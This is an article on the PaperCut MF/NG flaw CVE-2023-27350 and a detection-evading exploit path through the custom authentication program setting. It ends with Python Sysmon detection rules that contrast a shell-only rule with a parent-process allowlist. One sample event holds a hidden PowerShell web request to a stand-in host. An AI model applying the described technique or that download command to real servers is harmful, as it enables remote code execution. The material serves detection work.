Cybersecurity researchers have created a new exploit for the recently disclosed critical flaw in PaperCut servers, tracked as CVE-2023-27350, that bypasses all current detection methods. The flaw, rated CVSS 9.8, is an Improper Access Control vulnerability in PaperCut MF/NG: it allows an attacker to bypass authentication and execute code in the context of SYSTEM through the SetupCompleted class. On April 19th, print management software vendor PaperCut confirmed that it was aware of active exploitation of CVE-2023-27350, having received two reports of high/critical severity security issues in PaperCut MF/NG from cybersecurity firm Trend Micro. Trend Micro announced that it will disclose further details about the vulnerability on May 10th, 2023.
PaperCut addressed both vulnerabilities in PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11, and 22.0.9, and strongly recommends upgrading to one of these fixed versions. Researchers at Huntress observed post-exploitation activity in its partner environments after attackers exploited the PaperCut MF/NG vulnerabilities. Huntress security researcher Caleb Stewart also built a proof-of-concept exploit and shared a video of it. The report published by Huntress states: “From our recreated proof-of-concept, we observed child processes spawned underneath the pc-app.exe process. The screenshot below showcases a simple test of invoking PowerShell to call out to another location, demonstrating the achieved code execution.”
Presently, there are three types of detection: Sysmon-based (e.g. process creation analysis), log file analysis, and network signatures. The researchers demonstrated how to exploit the flaw through the “User/Group Sync” feature, which lets an administrator configure a custom authentication program. The PoC set that auth program to “/usr/sbin/python3” on Linux and “C:\Windows\System32\ftp.exe” on Windows. Because the username and password supplied at login are passed to that program, a malicious username and password submitted during a login attempt let the attacker execute arbitrary code on the vulnerable server, without spawning the cmd.exe or PowerShell child process that existing detections look for. The experts concluded, “An administrative user attacking PaperCut NG and MF can follow multiple paths to arbitrary code execution. Detections that focus on one particular code execution method, or that focus on a small subset of techniques used by one threat actor are doomed to be useless in the next round of attacks.” They added, “Attackers learn from defenders’ public detections, so it’s the defenders’ responsibility to produce robust detections that aren’t easily bypassed.”
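To make that last point concrete, here is an added example (not VulnCheck's or Huntress's code) that runs two Sysmon process-creation rules over a few constructed Event ID 1 records: a shell-only rule that matches the PowerShell child seen in the Huntress PoC, and a parent-based rule that flags any child of pc-app.exe outside a site allowlist. The pc-app.exe install path, the sample command lines and the allowlist contents are assumptions for illustration.

```python
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcCreate:
    """The fields of a Sysmon Event ID 1 (process creation) record we need."""
    parent_image: str
    image: str
    command_line: str


def _base(path: str) -> str:
    # ntpath handles both "\" and "/" separators; Windows names are case-insensitive.
    return ntpath.basename(path).lower()


# Constructed sample events, not real telemetry. The install path is assumed.
PC_APP = r"C:\Program Files\PaperCut NG\server\bin\win\pc-app.exe"
SAMPLE_EVENTS = [
    # The technique the Huntress PoC showed: PowerShell calling out from under pc-app.exe.
    ProcCreate(PC_APP,
               r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               'powershell.exe -nop -w hidden -c "Invoke-WebRequest http://192.0.2.10/a"'),
    # The detection-bypass variant: the auth program is ftp.exe, so no shell ever appears.
    ProcCreate(PC_APP, r"C:\Windows\System32\ftp.exe", "ftp.exe"),
    # Unrelated benign activity that must not alert.
    ProcCreate(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

# Signature-style rule: only well-known shells under pc-app.exe.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def narrow_detection(events):
    """Flag shells spawned by pc-app.exe; misses any other child image."""
    return [e for e in events
            if _base(e.parent_image) == "pc-app.exe" and _base(e.image) in SHELLS]


def parent_allowlist_detection(events, allowed=frozenset()):
    """Flag any child of pc-app.exe not in a site-specific allowlist.

    The allowlist is a placeholder: populate it from a baseline of what the real
    server spawns during normal operation, and keep it as short as possible.
    """
    return [e for e in events
            if _base(e.parent_image) == "pc-app.exe" and _base(e.image) not in allowed]


def missed_by_narrow(events, allowed=frozenset()):
    """Events the parent-based rule flags that the shell-only rule does not."""
    narrow = set(narrow_detection(events))
    return [e for e in parent_allowlist_detection(events, allowed) if e not in narrow]


def child_names(events):
    """Lower-cased child image basenames, for reporting and assertions."""
    return [_base(e.image) for e in events]


if __name__ == "__main__":
    for e in missed_by_narrow(SAMPLE_EVENTS):
        print("shell-only rule missed:", _base(e.parent_image), "->", e.command_line)
```

The parent-based rule is the one worth keeping: it does not care whether the auth program is python3, ftp.exe or something nobody has published yet, only that pc-app.exe spawned a child it normally would not. The cost is a tuning step per site, which is why the allowlist is a parameter rather than a hard-coded set.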